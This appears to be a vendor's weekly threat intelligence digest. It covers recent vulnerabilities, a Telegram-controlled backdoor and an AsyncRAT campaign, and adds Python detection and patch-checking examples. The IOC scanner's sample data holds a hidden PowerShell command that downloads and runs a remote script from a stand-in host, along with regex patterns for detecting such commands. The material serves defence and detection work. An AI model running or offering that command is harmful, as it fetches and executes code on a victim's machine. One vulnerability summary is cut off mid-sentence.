Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Cisco Patches Two Medium Severity Vulnerabilities Affecting its Secure Email Gateway, Video Phone 8875, and Desk Phone 9800 - On February 19, 2025, Cisco patched an email filter bypass vulnerability, CVE-2025-20153, affecting Cisco Secure Email Gateway running Cisco AsyncOS Software version 16.0 or earlier. Cisco also addressed an information disclosure vulnerability, CVE-2025-20158, affecting Cisco Video Phone 8875 and Cisco Desk Phone 9800, running Cisco SIP IP Phone Software version 3.2(1) or earlier with SSH access enabled.
CVE-2025-0108 and CVE-2025-0111 Affecting Palo Alto Networks PAN-OS Software Actively Exploited in the Wild - On February 18 and 20, 2025, CISA added two Palo Alto Networks PAN-OS vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalogue. CVE-2025-0108 is a critical authentication bypass in PAN-OS’ web management interface that allows remote, unauthenticated execution of PHP scripts. CVE-2025-0111 is a high-severity file read flaw that enables remote, authenticated attackers to access files readable by the “nobody” user.
Critical PHP SQL Injection Vulnerability CVE-2022-31631 Could Lead to Data Breaches – On February 13, 2025, cybersecurity firm JOCert published a report detailing CVE-2022-31631, a critical-severity vulnerability in PHP, which is a widely used server-side scripting
Potential Threats
Threat Actor Uses LNK Files Disguised as Wallpaper to Deploy AsyncRAT Malware - On February 22, 2025, Cyble reported that a likely Portuguese-speaking threat actor launched a malware campaign using a malicious LNK file disguised as wallpaper featuring a popular anime character to deploy AsyncRAT. AsyncRAT—a well-known remote access trojan—enables data exfiltration, remote command execution, and the installation of additional malware on the victim’s system.
StaryDobry Campaign Uses Fake Game Installers to Deliver XMRig Cryptomining Malware - Threat actors are distributing trojanized versions of popular games through torrent sites as part of the StaryDobry campaign, Kaspersky reported on February 18, 2025. These games include BeamNG.drive, Garry’s Mod, and Dyson Sphere Program. The threat actors behind StaryDobry uploaded these malicious game installers as early as September 2024, exploiting increased holiday torrent activity.
New Golang-Based Backdoor Uses Telegram as C2 Server to Execute Commands – On February 14, 2025, Netskope Threat Labs published an analysis of a newly discovered Golang-based backdoor that uses Telegram as its command-and-control (C2) channel. The backdoor sample, initially shared by @malwrhunterteam on February 4, 2025, uses the filenames "svchost.exe" and "rat.exe". Per Netskope Threat Labs, the backdoor allows threat actors to execute commands, maintain persistence, and self-delete.
General News
CL0P Releases Fourth Round of 50 Obfuscated Victim Names Related to Cleo MFT Exploitation - On February 18, 2025, CL0P Ransomware Group conducted a fourth release of an additional 50 obfuscated victim names related to their exploitation of Cleo’s Managed File Transfer (MFT).
North Korea’s Lazarus hackers behind $1.4 billion crypto theft from Bybit - Cybersecurity researchers say North Korean hackers are behind the largest cryptocurrency heist in history and are actively laundering the more than $1.4 billion in cryptocurrency stolen from the Bybit exchange on Friday.
Apple turns off iCloud encryption feature in UK following reported government legal order - Apple turned off the option for its British users to protect their iCloud accounts with end-to-end encryption on Friday, in the wake of a reported legal order from the British government.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and together determine the group’s severity rating. This week’s updates are shown below.
● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity

Threat Actor | Severity Change | Opportunity Change | Intent Change
---|---|---|---
miyak0 | New → Basic | 30 (↑ 30) | 36 (↑ 36)
Porsh | New → Basic | 30 (↑ 30) | 25 (↑ 25)
chestniybro | New → Basic | 30 (↑ 30) | 25 (↑ 25)
GD LockerSec | New → Basic | 30 (↑ 30) | 25 (↑ 25)
GreenBravo | New → Basic | 25 (↑ 25) | 26 (↑ 26)
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is marked with a small symbol indicating how actively it is trending.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲ Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲ Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
Attackers | Trend | Methods | Trend | Vulnerabilities | Trend | Targets | Trend
---|---|---|---|---|---|---|---
Lazarus Group (Cyber Warfare Guidance Unit, Diamond Sleet) | ▲ | Adware | ▲ | CVE-2025-27364 | ▲ | Cryptocurrency | ▲
North Korean Hackers | ▲ | Insider Threat | ▲ | CVE-2024-13159 | ▲ | Microsoft Office 365 | ▲
Cicada3301 Ransomware Group | ▲ | Phishing | ▲ | CVE-2018-0171 | ▲ | Bybit Exchange | ▲
Park Jin Hyok | ▲ | Trojan | ▲ | CVE-2025-26794 | ▲ | Infini | ▲
Medusa Ransomware Group (Frozen Spider, Transforming Scorpius) | ▲ | Cactus | ▲ | CVE-2024-24919 | ▲ | Energy and Natural Resources | ▲
Prominent Information Security Events
New Golang-Based Backdoor Uses Telegram as C2 Server to Execute Commands.
Source: Insikt Group, Netskope | TTP Instance
Intelligence Cards: Intelligence & Reports
IOC: SHA256 - dbfb478d52b870bb39d75faa7401c7a7b06e8e88b34ae050d02ff8a0e7545e86
On February 14, 2025, Netskope Threat Labs published an analysis of a newly discovered Golang-based backdoor that uses Telegram as its command-and-control (C2) channel. The backdoor sample, initially shared by @malwrhunterteam on February 4, 2025, uses the filenames "svchost.exe" and "rat.exe". Per Netskope Threat Labs, the backdoor—still under development yet fully functional—allows threat actors to execute commands, maintain persistence, and self-delete. By abusing Telegram as a C2 channel, the backdoor makes distinguishing normal API traffic from malicious activity more difficult for defenders.
Based on Netskope Threat Labs’ analysis, when executed the backdoor checks whether it is running from the path C:\Windows\Temp\svchost.exe. If not, it copies itself to that path, launches the copy as a new process, and terminates the original process. Once established, the backdoor initiates communication with Telegram by creating a bot instance through the “NewBotAPIWithClient” function. It then listens for new commands from the threat actor’s Telegram chat; upon receiving a command, it validates the command and proceeds with execution. The backdoor currently supports the following commands:
- “/cmd”: allows execution of PowerShell commands, sending the output back to the threat actor’s Telegram
- “/persist”: ensures the backdoor relaunches itself in the correct directory
- “/selfdestruct”: deletes the backdoor file, terminates the process, and sends the message “Self-destruct initiated” to the Telegram channel
- “/screenshot”: not yet functional; however, it still sends a notification to the threat actor’s Telegram with the message “Screenshot captured”
After performing these commands, the backdoor transmits all results via Telegram to the attacker’s Telegram channel.
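As an added illustration of how a defender can act on the behaviour described above (this is example code written for this digest, not Netskope’s tooling), the Python below applies two rules to constructed Sysmon-style endpoint events: an svchost.exe image started from anywhere other than the Windows system directories, and an outbound connection to the Telegram Bot API host from a process that is not on an allow-list. The event layout, the allow-list and the hostname api.telegram.org are assumptions of the example; the path C:\Windows\Temp\svchost.exe and the use of Telegram as the C2 channel come from the write-up.

```python
"""Added example: two detection rules for the behaviour described in the
Netskope write-up, run over constructed Sysmon-style events. Not Netskope's
code; the event layout and allow-list are assumptions of this example."""
from __future__ import annotations
import ntpath

# Directories where a genuine svchost.exe lives (assumption: standard Windows layout).
LEGIT_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Telegram Bot API endpoint, the backdoor's C2 channel per the analysis.
TELEGRAM_API_HOST = "api.telegram.org"
# Processes permitted to reach the Bot API in this hypothetical environment (none by default).
ALLOWED_TELEGRAM_PROCESSES: set[str] = set()

# Constructed events shaped like Sysmon Event ID 1 (process create) and 3 (network connect).
SAMPLE_EVENTS = [
    {"event_id": 1, "pid": 1204, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe"},
    {"event_id": 1, "pid": 5520, "image": r"C:\Users\alice\Downloads\rat.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"event_id": 1, "pid": 5532, "image": r"C:\Windows\Temp\svchost.exe",
     "parent_image": r"C:\Users\alice\Downloads\rat.exe"},
    {"event_id": 3, "pid": 5532, "image": r"C:\Windows\Temp\svchost.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"event_id": 3, "pid": 801, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"event_id": 3, "pid": 1204, "image": r"C:\Windows\System32\svchost.exe",
     "dest_host": "ctldl.windowsupdate.com", "dest_port": 80},
]


def masquerading_svchost(event: dict) -> bool:
    """Rule 1: a process named svchost.exe started from outside the system directories."""
    if event.get("event_id") != 1:
        return False
    directory, name = ntpath.split(event["image"])
    return name.lower() == "svchost.exe" and directory.lower() not in LEGIT_SVCHOST_DIRS


def unexpected_telegram_api(event: dict) -> bool:
    """Rule 2: a connection to the Telegram Bot API from a process not on the allow-list.
    The traffic itself is ordinary HTTPS to a legitimate service; the process is the signal."""
    if event.get("event_id") != 3:
        return False
    if event.get("dest_host", "").lower() != TELEGRAM_API_HOST:
        return False
    return ntpath.basename(event["image"]).lower() not in ALLOWED_TELEGRAM_PROCESSES


def run_detections(events: list[dict]) -> list[tuple[str, int, str]]:
    """Return (rule, pid, image) for every event that matches, in event order."""
    hits = []
    for ev in events:
        if masquerading_svchost(ev):
            hits.append(("masquerading_svchost", ev["pid"], ev["image"]))
        if unexpected_telegram_api(ev):
            hits.append(("unexpected_telegram_api", ev["pid"], ev["image"]))
    return hits


def correlate(events: list[dict]) -> set[int]:
    """PIDs that trip both rules: a misplaced svchost.exe that also talks to Telegram."""
    by_rule: dict[str, set[int]] = {}
    for rule, pid, _ in run_detections(events):
        by_rule.setdefault(rule, set()).add(pid)
    return by_rule.get("masquerading_svchost", set()) & by_rule.get("unexpected_telegram_api", set())


if __name__ == "__main__":
    for hit in run_detections(SAMPLE_EVENTS):
        print("ALERT", *hit)
    print("both rules:", sorted(correlate(SAMPLE_EVENTS)))
```

Rule 2 on its own also flags the browser event, which is exactly the difficulty the write-up notes about Telegram API traffic looking legitimate; `correlate()` keeps only PIDs that trip both rules, which reduces the output to the copy relaunched from C:\Windows\Temp.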
Threat Actor Uses LNK Files Disguised as Wallpaper to Deploy AsyncRAT Malware.
Source: Insikt Group, Cyble | Validated Intelligence Event
Intelligence Cards: Intelligence & Reports
IOC: SHA256 - 44444b5a4af7742b779a70af5ac7e443cd077ed924924e86f9de2ff932e43e74
IOC: SHA256 - 04fc833b59af93308029d3e87c85e327a1e480508bc78b6a4e46c0cbd65ea8dc
IOC: SHA256 - 26e91d3218cbd4f45da9f293f9647a1dfbf9d3d03aad5bd9ce85423d6e75450c
IOC: SHA256 - f76e582e0b43caad6db6665a17341d94c709ca09dd3e36fc3e588e4566d81502
IOC: SHA256 - 5abf73e0b8d2298167801995077fa414d2e2be2051aff75ad13bfd34d3ed6590
IOC: IP - 76.173.98[.]165
On February 22, 2025, Cyble reported that a likely Portuguese-speaking threat actor launched a malware campaign using a malicious LNK file disguised as wallpaper featuring a popular anime character to deploy AsyncRAT. AsyncRAT—a well-known remote access trojan—enables data exfiltration, remote command execution, and the installation of additional malware on the victim’s system.
The infection chain begins with a malicious LNK file disguised as an anime wallpaper. When victims execute the file, it triggers an obfuscated PowerShell script via cmd.exe. The script creates a web request object to fetch a PowerShell script and executes it directly in memory. This script then downloads and executes additional files, including a batch file output.bat.
The output.bat fetches and executes another PowerShell script which modifies the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) in memory to bypass security defences. The execution chain also incorporates AES encryption and GZIP compression to conceal scripts and payloads, making detection and analysis more difficult. In the final stage, AsyncRAT is executed in memory using reflection loading, ensuring persistence and evading security monitoring. Once active, AsyncRAT provides threat actors with full remote access to the compromised system.
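To show how the indicators and the behaviour described above can be turned into a check (this is example code written for this digest, not Cyble’s tooling), the Python below refangs the published IOCs and scans constructed endpoint events for two things: a file hash or destination IP that appears in the IOC list, and a PowerShell process launched by cmd.exe whose command line fetches content and executes it in memory. The event layout, the regular expressions and the sample command lines are assumptions of the example; the SHA256 values and the IP address are the ones listed in the digest.

```python
"""Added example, not Cyble's or the digest's own tooling: check endpoint events
against the IOCs listed above for this campaign and against the behaviour the
write-up describes (cmd.exe launching PowerShell that fetches a script and runs
it in memory). Events are constructed; hashes and IP come from the digest."""
import re

# SHA256 values and defanged IP exactly as published in the digest.
DIGEST_SHA256 = {
    "44444b5a4af7742b779a70af5ac7e443cd077ed924924e86f9de2ff932e43e74",
    "04fc833b59af93308029d3e87c85e327a1e480508bc78b6a4e46c0cbd65ea8dc",
    "26e91d3218cbd4f45da9f293f9647a1dfbf9d3d03aad5bd9ce85423d6e75450c",
    "f76e582e0b43caad6db6665a17341d94c709ca09dd3e36fc3e588e4566d81502",
    "5abf73e0b8d2298167801995077fa414d2e2be2051aff75ad13bfd34d3ed6590",
}
DIGEST_IPS_DEFANGED = {"76.173.98[.]165"}


def refang(indicator: str) -> str:
    """Undo report-style defanging ('[.]', 'hxxp') so IOCs compare with raw telemetry."""
    s = indicator.strip().lower().replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", s)


DIGEST_IPS = {refang(ip) for ip in DIGEST_IPS_DEFANGED}

# Behavioural signatures for the chain described above (assumed patterns, not Cyble's).
FETCH_RE = re.compile(r"net\.webclient|downloadstring|invoke-webrequest|\biwr\b", re.I)
EXEC_RE = re.compile(r"\biex\b|invoke-expression", re.I)
EVASION_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass", re.I)

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # (0) The lure: a .lnk in Downloads whose hash is one the digest lists.
    {"type": "file", "path": r"C:\Users\bob\Downloads\wallpaper.lnk",
     "sha256": "44444b5a4af7742b779a70af5ac7e443cd077ed924924e86f9de2ff932e43e74"},
    # (1) The chain: cmd.exe -> powershell.exe fetching a script and running it in memory.
    {"type": "process", "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS_IMAGE,
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/s.ps1')\""},
    # (2) Follow-on connection to the digest's IP, as telemetry records it (not defanged).
    {"type": "network", "image": PS_IMAGE, "dest_ip": "76.173.98.165", "dest_port": 80},
    # (3) Benign admin use: downloads a file to disk, executes nothing in memory.
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
     "cmdline": "powershell Invoke-WebRequest https://intranet.invalid/tool.zip -OutFile tool.zip"},
]


def ioc_matches(event: dict) -> list[str]:
    """Atomic indicators: file hash or destination IP present in the digest's IOC list."""
    reasons = []
    if event.get("sha256", "").lower() in DIGEST_SHA256:
        reasons.append("sha256 in digest IOC list")
    if "dest_ip" in event and refang(event["dest_ip"]) in DIGEST_IPS:
        reasons.append("destination IP in digest IOC list")
    return reasons


def behaviour_matches(event: dict) -> list[str]:
    """Behavioural indicators for PowerShell process-creation events."""
    if event.get("type") != "process" or not event.get("image", "").lower().endswith("powershell.exe"):
        return []
    cmd = event.get("cmdline", "")
    reasons = []
    if FETCH_RE.search(cmd) and EXEC_RE.search(cmd):
        reasons.append("PowerShell download cradle executed in memory")
        if event.get("parent_image", "").lower().endswith("\\cmd.exe"):
            reasons.append("launched via cmd.exe, consistent with an LNK lure")
    if EVASION_RE.search(cmd):
        reasons.append("hidden window / profile or policy bypass switches")
    return reasons


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(event index, reasons) for every event with at least one IOC or behavioural hit."""
    hits = []
    for i, ev in enumerate(events):
        reasons = ioc_matches(ev) + behaviour_matches(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(why))
```

The benign event (3) fetches a file but never executes anything in memory, so it produces no hit; requiring both the fetch and the execute pattern is what keeps the behavioural rule from firing on ordinary administrative downloads.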
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-20153 – Update to Cisco AsyncOS version 16-0-0-054
- CVE-2025-20158 – Update to Cisco SIP version 3.3(1)
- CVE-2025-0108 – Upgrade PAN-OS by release train:
  - PAN-OS 10.1: Upgrade to 10.1.14-h9 or later.
  - PAN-OS 10.2: Upgrade to 10.2.13-h3.
  - PAN-OS 11.0 (EoL): No fixes planned; upgrade to a supported version.
  - PAN-OS 11.1: Upgrade to 11.1.6-h1.
  - PAN-OS 11.2: Upgrade to 11.2.5 or later.
- CVE-2025-0111 – Upgrade PAN-OS by release train:
  - PAN-OS 10.1: Upgrade to 10.1.14-h9 or later.
  - PAN-OS 10.2: Upgrade to 10.2.13-h3 or a specified hotfix version (10.2.7-h24, 10.2.8-h21, 10.2.9-h21, 10.2.10-h14, 10.2.11-h12, 10.2.12-h6).
  - PAN-OS 11.0 (EoL): No fixes planned.
  - PAN-OS 11.1: Upgrade to 11.1.6-h1 or a specified hotfix version (11.1.2-h18, 11.1.4-h13).
  - PAN-OS 11.2: Upgrade to 11.2.5 or a specified hotfix version (11.2.4-h4).
- CVE-2022-31631 – Upgrade PHP by release branch:
  - PHP 8.0: Upgrade to version 8.0.27.
  - PHP 8.1: Upgrade to version 8.1.15.
  - PHP 8.2: Upgrade to version 8.2.2 or later.
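Because the PAN-OS fixes above are spread across maintenance releases and hotfix levels (a release such as 10.2.13 without the -h3 hotfix is still unpatched), checking a fleet by eye is error-prone. The Python below is an added example, not Palo Alto Networks’ or this digest’s own tooling: it parses PAN-OS version strings of the form major.minor.maintenance[-hN] and reports, for each of the two PAN-OS CVEs, whether an installed version is at or above a listed fix. The fixed versions are copied from the list above; the example assumes that a maintenance release later than the baseline fix on the same train also carries the fix, and reports the EoL 11.0 train as unfixed in every case.

```python
"""Added example, not Palo Alto Networks' or the digest's own tooling: check an
installed PAN-OS version against the fixed versions listed in the remediation
section for CVE-2025-0108 and CVE-2025-0111. Assumptions: a maintenance release
later than the baseline fix on the same train is treated as fixed, and 11.0 (EoL)
is always reported as having no fix."""
import re
from typing import Optional

# Fixed versions per (major, minor) train, copied from the remediation list above.
# The first entry on each train is the baseline release; later entries are hotfixed older releases.
FIXES: dict[str, dict[tuple[int, int], Optional[list[str]]]] = {
    "CVE-2025-0108": {
        (10, 1): ["10.1.14-h9"],
        (10, 2): ["10.2.13-h3"],
        (11, 0): None,  # EoL, no fixes planned
        (11, 1): ["11.1.6-h1"],
        (11, 2): ["11.2.5"],
    },
    "CVE-2025-0111": {
        (10, 1): ["10.1.14-h9"],
        (10, 2): ["10.2.13-h3", "10.2.7-h24", "10.2.8-h21", "10.2.9-h21",
                  "10.2.10-h14", "10.2.11-h12", "10.2.12-h6"],
        (11, 0): None,  # EoL, no fixes planned
        (11, 1): ["11.1.6-h1", "11.1.2-h18", "11.1.4-h13"],
        (11, 2): ["11.2.5", "11.2.4-h4"],
    },
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse(version: str) -> tuple[int, int, int, int]:
    """'10.2.13-h3' -> (10, 2, 13, 3); a release without a hotfix suffix has hotfix 0."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return int(major), int(minor), int(maint), int(hotfix or 0)


def status(version: str, cve: str) -> str:
    """One of 'fixed', 'vulnerable', 'eol-no-fix', 'unknown-train'."""
    major, minor, maint, hotfix = parse(version)
    train = (major, minor)
    if train not in FIXES[cve]:
        return "unknown-train"
    train_fixes = FIXES[cve][train]
    if train_fixes is None:
        return "eol-no-fix"
    parsed = [parse(f) for f in train_fixes]
    baseline_maint = parsed[0][2]
    if maint > baseline_maint:          # assumption: later maintenance releases carry the fix
        return "fixed"
    for _, _, fix_maint, fix_hotfix in parsed:
        if maint == fix_maint and hotfix >= fix_hotfix:
            return "fixed"              # exact release with at least the fixing hotfix level
    return "vulnerable"


def audit(versions: list[str], cve: str) -> dict[str, str]:
    """Map each installed version to its status for the given CVE."""
    return {v: status(v, cve) for v in versions}


if __name__ == "__main__":
    # Constructed fleet inventory, not real data.
    fleet = ["10.1.14-h9", "10.2.13", "10.2.8-h21", "10.2.8-h20", "11.0.4", "11.2.4-h4", "9.1.17"]
    for cve in FIXES:
        print(cve, audit(fleet, cve))
```

Note that the same version can be fixed for one CVE and not the other: 10.2.8-h21 is a listed hotfix for CVE-2025-0111 but is below the only 10.2 fix (10.2.13-h3) listed for CVE-2025-0108, so a per-CVE check is needed rather than a single "minimum version" rule.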
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.